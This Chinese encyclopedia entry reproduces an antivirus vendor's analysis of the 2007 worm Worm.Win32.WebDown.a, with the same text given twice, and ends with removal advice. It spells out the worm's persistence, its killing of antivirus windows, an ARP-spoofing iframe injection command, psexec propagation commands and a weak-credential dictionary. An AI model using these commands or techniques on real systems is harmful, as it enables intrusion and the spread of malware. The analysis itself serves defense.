“Worm.Win32.WebDown.a”的意思、由来-中文百科全书

病毒信息

危险等级：★★★

病毒名称：Worm.Win32.WebDown.a

截获时间：2007-12-20

入库版本：20.23.32

类型：感染型病毒

感染的操作系统：Windows所有版本系统

威胁情况：

传播级别：高

全球化传播态势：低

清除难度：困难

破坏力：高

破坏手段：网络传播、下载

清除方法

1、检查运行状态

病毒运行后首先检测自己的是否是以“%system32%\\IME\\svchost.exe”运行，如不是则进行复制自己等初始化操作，反之则以服务方式运行。

2、初始化操作

病毒删除“%system32%\\IME\\svchost.exe”，然后复制自己为该文件，并将属性设置为系统、隐藏，然后病毒调用CreateProcessA启动“%system32%\\IME\\svchost.exe”。

病毒启动“%system32%\\IME\\svchost.exe”后，释放批处理文件rs.bat并执行，以此来删除自己。

3、注册为服务运行

病毒通过调用StartServiceCtrlDispatcher、CreateServiceA等函数，注册名称为“Alerter COM+”、目标为“%system32%\\IME\\svchost.exe”的服务，然后调用StartServiceA启动服务。

4、病毒的服务过程

病毒调用CreateMutexA尝试生成名为“"Alerter COM+”的互斥量，如失败则退出，以此来保证只有一个服务实例在运行。

病毒启动4个工作线程尝试进行网络传播和下载（详细见后面）。

病毒根据标志决定是否对本地固定逻辑盘建立AutoRun机制（详细见后面）。

病毒注册并生成窗口类名为“WebDown”、窗口名为“Alerter COM+”的隐藏窗口，并启动消息循环，然后向该窗口发送WM_DEVICECHANGE消息。

5、在固定磁盘中建立AutoRun实现自启动

病毒根据标志（写在病毒内，推测为生成病毒时设置的）决定是否对固定硬盘建立自动运行机制。

如标志为建立，病毒对c到z逻辑盘调用GetDriveTypeA ，对类型为DRIVE_FIXED的固定逻辑盘建立自动运行机制。

病毒复制自己到该逻辑盘根目录下，名称为“setup.exe”，并生成AutoRun.inf文件以达到自动运行，病毒将setup.exe和AutoRun.inf的文件属性设置为系统和隐藏。

6、窗口消息处理

在窗口循环中，病毒处理如下消息：

WM_CLOSE、WM_DESTROY消息，病毒调用默认窗口处理过程。

WM_CREATE消息，在窗口生成的时候，病毒调用SetTimer建立两个Timer，间隔为1秒和20分钟，回调方式为接收WM_TIMER消息。

WM_TIMER消息，病毒没隔1秒调用破坏反病毒软件和复制自己的代码（详细见后面），每隔20分钟尝试下载http://www. XXXXX.cn/jj/svch0st.exe为本地%system32%\\down.exe并运行。

WM_DEVICECHANGE消息，病毒通过处理该消息得到新插入的可移动设备，并对该设备进行感染（写入病毒并建立AutoRun机制）。

7、破坏反病毒软件和复写文件

病毒在通过处理WM_TIMER消息，每隔1秒检测并破坏反病毒软件。病毒通过调用GetCursorPos、WindowFromPoint、GetParent等函数获取当前光标下的窗口及其顶层父窗口，检测其窗口标题中是否是或包含如下内容：

Windows 任务管理器、安全卫士、扫描、专杀、注册表、Process、进程、木马、防御、防火墙、病毒、检测、Firewall、virus、anti、金山、江民、卡巴斯基、worm、杀毒

如包含这些内容，病毒通过向其发送WM_DESTROY、WM_CLOSE消息来破坏这些窗口，以此来破坏反病毒软件的运行。

病毒通过处理WM_TIMER消息，每隔1秒复制自己并复写注册表，以保护自己。病毒将自己复制为%system32%下的internt.exe和progmon.exe，并写入如下注册表信息：

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer

\\Advanced\\Folder\\Hidden\\SHOWALL "CheckedValue" = 0X00000000

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Currentversion\\Run

"Internt" = %SYSTEM%\\INTERNT.EXE

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Currentversion\\Run

"Program file" = %SYSTEM%\\PROGMON.EXE

工作线程1：

病毒尝试下载http://www.XXXXX.cn/jj/conn.exe为本地%system32%\\BindF.exe并运行。

工作线程2：

病毒从http://www. XXXXX.cn/jj/下载如下文件到%system32%\\目录：

ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe

病毒获取当前网段(例如193.168.0.55)，并将最后一个字段替换为%s2-%s255，然后以如下参数启动ArpW.exe。

“ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "<iframe src='http://www.1988712.cn/jj/index.htm' width=0 height=0>"”

病毒通过下载的Arp欺骗病毒，将代码插入局域网中的http包中。

工作线程3：

病毒从病毒从http://www. XXXXX.cn/jj/下载psexec.exe和server.exe到本地%system32%目录。

在此线程中，病毒每隔30分钟循环执行如下代码感染网络：

（1）感染局域网计算机。病毒获取本机ip后以此遍历局域网，通过自带的用户名和密码字典（见后面）尝试将psexec.exe和server.exe写入局域网中其它计算机的%system32%目录，然后以如下命令行启动psexec.exe。

"%system32%\\psexec.exe \\\\192.168.0.2 -u 用户名 -p "密码" -c %system32%\\servrr.exe -d"

（2）感染指定ip的计算机。病毒下载"http://union.itlearner.com/ip/getip.asp"，并通过在其中搜索“input name=\\"ip\\”来获取ip地址，然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。

（3）感染当前连接的计算机。病毒通过调用GetTcpTable、GetUdpTable等函数获取当前连接的计算机的ip地址，然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。

用户名和密码字典如下：

用户名：administrator、admin、guest、alex、home、love、user、game、movie、time、yeah、money、xpuser

密码：NULL、password、123456、qwerty、abc123、memory、12345678、88888、5201314、1314520、asdfgh、angel、asdf、baby、woaini

工作线程4：

病毒每隔1秒，循环尝试下载http://www. XXXXX.cn/jj/svch0st.exe到本机%system32%并运行。

8、病毒的感染代码

在病毒体中包含了感染代码，但病毒本身并未调用。该感染代码中存在api地址硬编码等问题，在运行时会出现问题。

在感染代码中保护如下操作：

病毒首先复制自己为%system32\\drivers\\svchost.exe。

病毒将自己复制到如下目录，名称为随机文件名.exe：

%system32\\drivers\\、%system32\\dllcache\\、%system32\\IME\\

c:\\Program Files\\Common Files\\Microsoft Shared\\、

c:\\Program Files\\Internet Explorer\\Connection Wizard\\、

c:\\Program Files\\Windows Media Player\\、

c:\\WINDOWS\\addins\\、

c:\\WINDOWS\\system\\

病毒遍历c到z的逻辑盘，对所有目录进行感染，但排除保护如下字符串的目录：

Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、ComPlus Applications;Messenger、WINNT、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Messenger、Microsoft Frontpage、Movie Maker、WINDOWS。

病毒只感染后缀名为exe的pe可执行文件，感染时病毒在被感染文件的代码节的最后的内容为0的地方（为文件对齐补的）写入病毒代码，并将pe头中入口点改为指向病毒代码。

在感染的病毒代码中，病毒调用CreateProcessA（该函数地址为感染时写入的硬编码）启动“C:\\WINDOWS\\system32\\drivers\\mmaou.exe”（感染时写入，文件为感染时复制的病毒本身），然后通过记录的原入口点跳回原程序正常入口点执行。

安全建议

1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件每天至少升级三次。

2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

3 不浏览不良网站，不随意下载安装可疑插件。

4 不接收QQ、MSN、Emial等传来的可疑文件。

5 上网时打开杀毒软件实时监控功能。

6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

清除办法：

瑞星杀毒软件清除办法：

安装瑞星杀毒软件，升级到20.23.32版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。

词条	Worm.Win32.WebDown.a
释义	Worm.Win32.WebDown.a是一个蠕虫型病毒，通过枚举局域网地址、获取被感染者当前的连接、下载ip地址信息的方式获取ip地址，并对这些地址尝试进行传播。病毒同时下载程序进行运行。病毒由VC6语言编写，加壳保护。病毒信息清除方法(1、检查运行状态 2、初始化操作 3、注册为服务运行 4、病毒的服务过程 5、在固定磁盘中建立AutoRun实现自启动 6、窗口消息处理 7、破坏反病毒软件和复写文件 8、病毒的感染代码) 安全建议病毒信息危险等级：★★★ 病毒名称：Worm.Win32.WebDown.a 截获时间：2007-12-20 入库版本：20.23.32 类型：感染型病毒感染的操作系统：Windows所有版本系统威胁情况：传播级别：高全球化传播态势：低清除难度：困难破坏力：高破坏手段：网络传播、下载清除方法 1、检查运行状态病毒运行后首先检测自己的是否是以“%system32%\\IME\\svchost.exe”运行，如不是则进行复制自己等初始化操作，反之则以服务方式运行。 2、初始化操作病毒删除“%system32%\\IME\\svchost.exe”，然后复制自己为该文件，并将属性设置为系统、隐藏，然后病毒调用CreateProcessA启动“%system32%\\IME\\svchost.exe”。病毒启动“%system32%\\IME\\svchost.exe”后，释放批处理文件rs.bat并执行，以此来删除自己。 3、注册为服务运行病毒通过调用StartServiceCtrlDispatcher、CreateServiceA等函数，注册名称为“Alerter COM+”、目标为“%system32%\\IME\\svchost.exe”的服务，然后调用StartServiceA启动服务。 4、病毒的服务过程病毒调用CreateMutexA尝试生成名为“"Alerter COM+”的互斥量，如失败则退出，以此来保证只有一个服务实例在运行。病毒启动4个工作线程尝试进行网络传播和下载（详细见后面）。病毒根据标志决定是否对本地固定逻辑盘建立AutoRun机制（详细见后面）。病毒注册并生成窗口类名为“WebDown”、窗口名为“Alerter COM+”的隐藏窗口，并启动消息循环，然后向该窗口发送WM_DEVICECHANGE消息。 5、在固定磁盘中建立AutoRun实现自启动病毒根据标志（写在病毒内，推测为生成病毒时设置的）决定是否对固定硬盘建立自动运行机制。如标志为建立，病毒对c到z逻辑盘调用GetDriveTypeA ，对类型为DRIVE_FIXED的固定逻辑盘建立自动运行机制。病毒复制自己到该逻辑盘根目录下，名称为“setup.exe”，并生成AutoRun.inf文件以达到自动运行，病毒将setup.exe和AutoRun.inf的文件属性设置为系统和隐藏。 6、窗口消息处理在窗口循环中，病毒处理如下消息： WM_CLOSE、WM_DESTROY消息，病毒调用默认窗口处理过程。 WM_CREATE消息，在窗口生成的时候，病毒调用SetTimer建立两个Timer，间隔为1秒和20分钟，回调方式为接收WM_TIMER消息。 WM_TIMER消息，病毒没隔1秒调用破坏反病毒软件和复制自己的代码（详细见后面），每隔20分钟尝试下载http://www. XXXXX.cn/jj/svch0st.exe为本地%system32%\\down.exe并运行。 WM_DEVICECHANGE消息，病毒通过处理该消息得到新插入的可移动设备，并对该设备进行感染（写入病毒并建立AutoRun机制）。 7、破坏反病毒软件和复写文件病毒在通过处理WM_TIMER消息，每隔1秒检测并破坏反病毒软件。病毒通过调用GetCursorPos、WindowFromPoint、GetParent等函数获取当前光标下的窗口及其顶层父窗口，检测其窗口标题中是否是或包含如下内容： Windows 任务管理器、安全卫士、扫描、专杀、注册表、Process、进程、木马、防御、防火墙、病毒、检测、Firewall、virus、anti、金山、江民、卡巴斯基、worm、杀毒如包含这些内容，病毒通过向其发送WM_DESTROY、WM_CLOSE消息来破坏这些窗口，以此来破坏反病毒软件的运行。病毒通过处理WM_TIMER消息，每隔1秒复制自己并复写注册表，以保护自己。病毒将自己复制为%system32%下的internt.exe和progmon.exe，并写入如下注册表信息： HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer \\Advanced\\Folder\\Hidden\\SHOWALL "CheckedValue" = 0X00000000 HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Currentversion\\Run "Internt" = %SYSTEM%\\INTERNT.EXE HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Currentversion\\Run "Program file" = %SYSTEM%\\PROGMON.EXE 工作线程1：病毒尝试下载http://www.XXXXX.cn/jj/conn.exe为本地%system32%\\BindF.exe并运行。工作线程2：病毒从http://www. XXXXX.cn/jj/下载如下文件到%system32%\\目录： ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe 病毒获取当前网段(例如193.168.0.55)，并将最后一个字段替换为%s2-%s255，然后以如下参数启动ArpW.exe。 “ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "<iframe src='http://www.1988712.cn/jj/index.htm' width=0 height=0>"” 病毒通过下载的Arp欺骗病毒，将代码插入局域网中的http包中。工作线程3：病毒从病毒从http://www. XXXXX.cn/jj/下载psexec.exe和server.exe到本地%system32%目录。在此线程中，病毒每隔30分钟循环执行如下代码感染网络：（1）感染局域网计算机。病毒获取本机ip后以此遍历局域网，通过自带的用户名和密码字典（见后面）尝试将psexec.exe和server.exe写入局域网中其它计算机的%system32%目录，然后以如下命令行启动psexec.exe。 "%system32%\\psexec.exe \\\\192.168.0.2 -u 用户名 -p "密码" -c %system32%\\servrr.exe -d" （2）感染指定ip的计算机。病毒下载"http://union.itlearner.com/ip/getip.asp"，并通过在其中搜索“input name=\\"ip\\”来获取ip地址，然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。（3）感染当前连接的计算机。病毒通过调用GetTcpTable、GetUdpTable等函数获取当前连接的计算机的ip地址，然后利用用户名和密码字典尝试对该ip地址的计算机写入psexec.exe和server.exe并启动运行。用户名和密码字典如下：用户名：administrator、admin、guest、alex、home、love、user、game、movie、time、yeah、money、xpuser 密码：NULL、password、123456、qwerty、abc123、memory、12345678、88888、5201314、1314520、asdfgh、angel、asdf、baby、woaini 工作线程4：病毒每隔1秒，循环尝试下载http://www. XXXXX.cn/jj/svch0st.exe到本机%system32%并运行。 8、病毒的感染代码在病毒体中包含了感染代码，但病毒本身并未调用。该感染代码中存在api地址硬编码等问题，在运行时会出现问题。在感染代码中保护如下操作：病毒首先复制自己为%system32\\drivers\\svchost.exe。病毒将自己复制到如下目录，名称为随机文件名.exe： %system32\\drivers\\、%system32\\dllcache\\、%system32\\IME\\ c:\\Program Files\\Common Files\\Microsoft Shared\\、 c:\\Program Files\\Internet Explorer\\Connection Wizard\\、 c:\\Program Files\\Windows Media Player\\、 c:\\WINDOWS\\addins\\、 c:\\WINDOWS\\system\\ 病毒遍历c到z的逻辑盘，对所有目录进行感染，但排除保护如下字符串的目录： Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、ComPlus Applications;Messenger、WINNT、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Messenger、Microsoft Frontpage、Movie Maker、WINDOWS。病毒只感染后缀名为exe的pe可执行文件，感染时病毒在被感染文件的代码节的最后的内容为0的地方（为文件对齐补的）写入病毒代码，并将pe头中入口点改为指向病毒代码。在感染的病毒代码中，病毒调用CreateProcessA（该函数地址为感染时写入的硬编码）启动“C:\\WINDOWS\\system32\\drivers\\mmaou.exe”（感染时写入，文件为感染时复制的病毒本身），然后通过记录的原入口点跳回原程序正常入口点执行。安全建议 1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件每天至少升级三次。 2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。 3 不浏览不良网站，不随意下载安装可疑插件。 4 不接收QQ、MSN、Emial等传来的可疑文件。 5 上网时打开杀毒软件实时监控功能。 6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。清除办法：瑞星杀毒软件清除办法：安装瑞星杀毒软件，升级到20.23.32版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。
随便看	吴红云吴红娅吴红瑛吴侯吴厚斌吴厚程吴厚德吴厚刚吴厚吉吴厚猛吴厚浓吴厚庆吴厚新吴厚元吴后祥吴后义吴湖帆吴湖帆秋山晴霭图吴虎吴虎臣吴护平吴沪生吴花×浒星吴华吴华宝